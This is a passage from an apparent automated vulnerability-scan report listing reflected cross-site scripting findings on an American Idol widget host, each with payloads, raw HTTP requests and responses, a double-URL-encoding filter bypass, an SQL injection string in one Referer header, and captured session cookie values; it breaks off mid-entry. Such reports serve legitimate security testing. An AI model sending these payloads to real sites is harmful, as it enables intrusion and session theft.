Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.1.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:07:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:07:48 GMT
Content-Length: 1363
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/redirect.one?redirect_to=http://www.americanidol.com/c05ca'><script>alert(1)</script>4c9652dc110'>
...[SNIP]...

1.96. http://widgets.myidol.americanidol.com/tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript identifier: the response is served as application/javascript and declares function oneWidgetWaitForCookie_tools<value>(), with the value spliced in unescaped. The scanner classified the context as a JavaScript string encapsulated in single quotation marks. The payload d1e02%2527%253balert%25281%2529%252f%252ffadcf0d5e4c was submitted in the REST URL parameter 1. This input was echoed as d1e02';alert(1)//fadcf0d5e4c in the application's response.

This proof-of-concept shows that quotes, semicolons and slashes reach a script context unmodified. Because the landing point is a function name rather than a string literal, the breakout as echoed leaves the declaration syntactically invalid, so confirm execution in a browser before rating this as exploitable on the strength of the echo alone.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character: the web server decodes it once to %3c, which passes the filter, and the application then decodes it again to <.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /toolsd1e02%2527%253balert%25281%2529%252f%252ffadcf0d5e4c/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E HTTP/1.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4170
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:31 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsd1e02';alert(1)//fadcf0d5e4c/'"--></style><_script>html_removednetsparker(0x000051)<_script>() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirec
...[SNIP]...
<_script>').style.display = 'block';
                                   }
           else {
               // Wait some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_toolsd1e02';alert(1)//fadcf0d5e4c/'"-->
...[SNIP]...

1.97. http://widgets.myidol.americanidol.com/tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript identifier: the response is served as application/javascript and declares function oneWidgetWaitForCookie_tools<value>(), with the value spliced in unescaped. The scanner classified the context as a JavaScript expression not encapsulated in any quotation marks. The payload f31bd%253balert%25281%2529%252f%252f4dfd4995b75 was submitted in the REST URL parameter 1. This input was echoed as f31bd;alert(1)//4dfd4995b75 in the application's response.

This proof-of-concept shows that semicolons, parentheses and slashes reach a script context unmodified. Because the landing point is a function name, the ;alert(1)// as echoed leaves the declaration syntactically invalid, so confirm execution in a browser before rating this as exploitable on the strength of the echo alone.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character: the web server decodes it once to %3c, which passes the filter, and the application then decodes it again to <.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /toolsf31bd%253balert%25281%2529%252f%252f4dfd4995b75/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E HTTP/1.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4152
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:31 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsf31bd;alert(1)//4dfd4995b75/'"--></style><_script>html_removednetsparker(0x000051)<_script>() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect
...[SNIP]...

1.98. http://widgets.myidol.americanidol.com/tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript identifier: the response is served as application/javascript and declares function oneWidgetWaitForCookie_tools<value>(), with the value spliced in unescaped. The scanner classified the context as a JavaScript string encapsulated in double quotation marks. The payload 1c337%2522%253balert%25281%2529%252f%252f0f1dd352c7c was submitted in the REST URL parameter 1. This input was echoed as 1c337";alert(1)//0f1dd352c7c in the application's response.

This proof-of-concept shows that double quotes, semicolons and slashes reach a script context unmodified. Because the landing point is a function name rather than a string literal, the breakout as echoed leaves the declaration syntactically invalid, so confirm execution in a browser before rating this as exploitable on the strength of the echo alone.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character: the web server decodes it once to %3c, which passes the filter, and the application then decodes it again to <.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /tools1c337%2522%253balert%25281%2529%252f%252f0f1dd352c7c/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E HTTP/1.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4170
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:30 GMT
Connection: close

       function oneWidgetWaitForCookie_tools1c337";alert(1)//0f1dd352c7c/'"--></style><_script>html_removednetsparker(0x000051)<_script>() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirec
...[SNIP]...
<_script>').style.display = 'block';
                                   }
           else {
               // Wait some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_tools1c337";alert(1)//0f1dd352c7c/'"-->
...[SNIP]...

1.99. http://widgets.myidol.americanidol.com/tools/Netsparkerdcf8046f3ca84302a46153adee19582b/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/Netsparkerdcf8046f3ca84302a46153adee19582b/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript identifier: the response is served as application/javascript and declares function oneWidgetWaitForCookie_tools<value>_Netsparkerdcf8046f3ca84302a46153adee19582b_(), with the value spliced in unescaped (only the path separators are rewritten to underscores). The scanner classified the context as a JavaScript string encapsulated in single quotation marks. The payload bea22%2527%253balert%25281%2529%252f%252f4e19821fe3b was submitted in the REST URL parameter 1. This input was echoed as bea22';alert(1)//4e19821fe3b in the application's response.

This proof-of-concept shows that quotes, semicolons and slashes reach a script context unmodified. Because the landing point is a function name rather than a string literal, the breakout as echoed leaves the declaration syntactically invalid, so confirm execution in a browser before rating this as exploitable on the strength of the echo alone.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character: the web server decodes it once to %3c, which passes the filter, and the application then decodes it again to <.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /toolsbea22%2527%253balert%25281%2529%252f%252f4e19821fe3b/Netsparkerdcf8046f3ca84302a46153adee19582b/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3994
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:09 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsbea22';alert(1)//4e19821fe3b_Netsparkerdcf8046f3ca84302a46153adee19582b_() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
                           doc
...[SNIP]...
some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_toolsbea22';alert(1)//4e19821fe3b_Netsparkerdcf8046f3ca84302a46153adee19582b_) {
                   setTimeout(oneWidgetWaitForCookie_toolsbea22';alert(1)//4e19821fe3b_Netsparkerdcf8046f3ca84302a46153adee19582b_, 400);
               }
           }
       }
       function oneWidgetRedirStart() {
           document.cookie = "owrstart=1; expires=0; path=/";
           return;
       }
       function oneWidgetRedirAl
...[SNIP]...

1.100. http://widgets.myidol.americanidol.com/tools/Netsparkerdcf8046f3ca84302a46153adee19582b/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/Netsparkerdcf8046f3ca84302a46153adee19582b/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript identifier: the response is served as application/javascript and declares function oneWidgetWaitForCookie_tools<value>_Netsparkerdcf8046f3ca84302a46153adee19582b_(), with the value spliced in unescaped. The scanner classified the context as a JavaScript expression not encapsulated in any quotation marks. The payload f2835%253balert%25281%2529%252f%252f2a7b9c1de45 was submitted in the REST URL parameter 1. This input was echoed as f2835;alert(1)//2a7b9c1de45 in the application's response.

This proof-of-concept shows that semicolons, parentheses and slashes reach a script context unmodified. Because the landing point is a function name, the ;alert(1)// as echoed leaves the declaration syntactically invalid, so confirm execution in a browser before rating this as exploitable on the strength of the echo alone.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character: the web server decodes it once to %3c, which passes the filter, and the application then decodes it again to <.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /toolsf2835%253balert%25281%2529%252f%252f2a7b9c1de45/Netsparkerdcf8046f3ca84302a46153adee19582b/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3976
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:10 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsf2835;alert(1)//2a7b9c1de45_Netsparkerdcf8046f3ca84302a46153adee19582b_() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
                           docu
...[SNIP]...

1.101. http://widgets.myidol.americanidol.com/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/

Issue detail

The value of REST URL parameter 1 is echoed unmodified into the response. The scanner classified the context as plain text between HTML tags, but the response is served as application/javascript and the value lands inside the JavaScript function name oneWidgetWaitForCookie_tools<value>_..., the same context as issues 1.96 to 1.100. The payload efafb<x%20style%3dx%3aexpr/**/ession(alert(1))>adba755e1d6 was submitted in the REST URL parameter 1. This input was echoed as efafb<x style=x:expr/**/ession(alert(1))>adba755e1d6 in the application's response.

The echo shows that <, >, =, : and parentheses pass through without encoding. The proof-of-concept relies on an Internet Explorer-only CSS expression() in a style attribute, which runs only if the response is parsed as HTML; with the declared JavaScript content type it will not, so this finding should be treated as a script-context injection and re-verified in that context rather than reported on the HTML PoC as shown.

Request

GET /toolsefafb<x%20style%3dx%3aexpr/**/ession(alert(1))>adba755e1d6/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/ HTTP/1.1
Referer: http://widgets.myidol.americanidol.com/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/%EF%BF%BDw%1A%EF%BF%BD
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4032
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:49 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsefafb<x style=x:expr/**/ession(alert(1))>adba755e1d6_jwk...u......^r...(...{_() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
               
...[SNIP]...

1.102. http://widgets.myidol.americanidol.com/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/%EF%BF%BDw%1A%EF%BF%BD [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/%EF%BF%BDw%1A%EF%BF%BD

Issue detail

The value of REST URL parameter 1 is echoed unmodified into the response. The scanner classified the context as plain text between HTML tags, but the response is served as application/javascript and the value lands inside the JavaScript function name oneWidgetWaitForCookie_tools<value>_..., the same context as issues 1.96 to 1.100. The payload 35ae1<x%20style%3dx%3aexpr/**/ession(alert(1))>6ba37e770d1 was submitted in the REST URL parameter 1. This input was echoed as 35ae1<x style=x:expr/**/ession(alert(1))>6ba37e770d1 in the application's response.

The echo shows that <, >, =, : and parentheses pass through without encoding. The proof-of-concept relies on an Internet Explorer-only CSS expression() in a style attribute, which runs only if the response is parsed as HTML; with the declared JavaScript content type it will not, so this finding should be treated as a script-context injection and re-verified in that context rather than reported on the HTML PoC as shown.

Request

GET /tools35ae1<x%20style%3dx%3aexpr/**/ession(alert(1))>6ba37e770d1/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/%EF%BF%BDw%1A%EF%BF%BD HTTP/1.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url='+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+'1'%3D'
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4140
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:49 GMT
Connection: close

       function oneWidgetWaitForCookie_tools35ae1<x style=x:expr/**/ession(alert(1))>6ba37e770d1_jwk...u......^r...(...{_...w....() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect butt
...[SNIP]...

1.103. http://widgets.myidol.americanidol.com/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/Netsparker8f4d94ef206e4e3b82c23a8a89d01567/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/Netsparker8f4d94ef206e4e3b82c23a8a89d01567/

Issue detail

The value of REST URL parameter 1 is echoed unmodified into the response. The scanner classified the context as plain text between HTML tags, but the response is served as application/javascript and the value lands inside the JavaScript function name oneWidgetWaitForCookie_tools<value>/jwk..._Netsparker8f4d94ef206e4e3b82c23a8a89d01567_(), the same context as issues 1.96 to 1.100. The payload fd987<x%20style%3dx%3aexpr/**/ession(alert(1))>f3d34dfffb7 was submitted in the REST URL parameter 1. This input was echoed as fd987<x style=x:expr/**/ession(alert(1))>f3d34dfffb7 in the application's response.

The echo shows that <, >, =, : and parentheses pass through without encoding. The proof-of-concept relies on an Internet Explorer-only CSS expression() in a style attribute, which runs only if the response is parsed as HTML; with the declared JavaScript content type it will not, so this finding should be treated as a script-context injection and re-verified in that context rather than reported on the HTML PoC as shown.

Request

GET /toolsfd987<x%20style%3dx%3aexpr/**/ession(alert(1))>f3d34dfffb7/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/Netsparker8f4d94ef206e4e3b82c23a8a89d01567/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4516
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:33:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:33:03 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsfd987<x style=x:expr/**/ession(alert(1))>f3d34dfffb7/jwk...u......^r...(...{_Netsparker8f4d94ef206e4e3b82c23a8a89d01567_() {
           ckCntr++;
           if (ckCntr > 12)
...[SNIP]...

1.104. http://widgets.myidol.americanidol.com/tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript identifier: the response is served as application/javascript and declares function oneWidgetWaitForCookie_tools<value>/keyslave.one...(), with the value spliced in unescaped. The scanner classified the context as a JavaScript expression not encapsulated in any quotation marks. The payload 51aed%253balert%25281%2529%252f%252f31e4ba16cf was submitted in the REST URL parameter 1. This input was echoed as 51aed;alert(1)//31e4ba16cf in the application's response.

This proof-of-concept shows that semicolons, parentheses and slashes reach a script context unmodified. Because the landing point is a function name, the ;alert(1)// as echoed leaves the declaration syntactically invalid, so confirm execution in a browser before rating this as exploitable on the strength of the echo alone.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character: the web server decodes it once to %3c, which passes the filter, and the application then decodes it again to <.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /tools51aed%253balert%25281%2529%252f%252f31e4ba16cf/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4262
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:31 GMT
Connection: close

       function oneWidgetWaitForCookie_tools51aed;alert(1)//31e4ba16cf/keyslave.one'"--></style><_script>html_removednetsparker(0x000046)<_script>() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Sh
...[SNIP]...

1.105. http://widgets.myidol.americanidol.com/tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript identifier: the response is served as application/javascript and declares function oneWidgetWaitForCookie_tools<value>/keyslave.one...(), with the value spliced in unescaped. The scanner classified the context as a JavaScript string encapsulated in double quotation marks. The payload f3f67%2522%253balert%25281%2529%252f%252f718932c3ebf was submitted in the REST URL parameter 1. This input was echoed as f3f67";alert(1)//718932c3ebf in the application's response.

This proof-of-concept shows that double quotes, semicolons and slashes reach a script context unmodified. Because the landing point is a function name rather than a string literal, the breakout as echoed leaves the declaration syntactically invalid, so confirm execution in a browser before rating this as exploitable on the strength of the echo alone.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character: the web server decodes it once to %3c, which passes the filter, and the application then decodes it again to <.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /toolsf3f67%2522%253balert%25281%2529%252f%252f718932c3ebf/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4290
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:29 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsf3f67";alert(1)//718932c3ebf/keyslave.one'"--></style><_script>html_removednetsparker(0x000046)<_script>() {
           ckCntr++;
           if (ckCntr > 12) {
                                           //
...[SNIP]...
<_script>').style.display = 'block';
                                   }
           else {
               // Wait some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_toolsf3f67";alert(1)//718932c3ebf/keyslave.one'"-->
...[SNIP]...

1.106. http://widgets.myidol.americanidol.com/tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
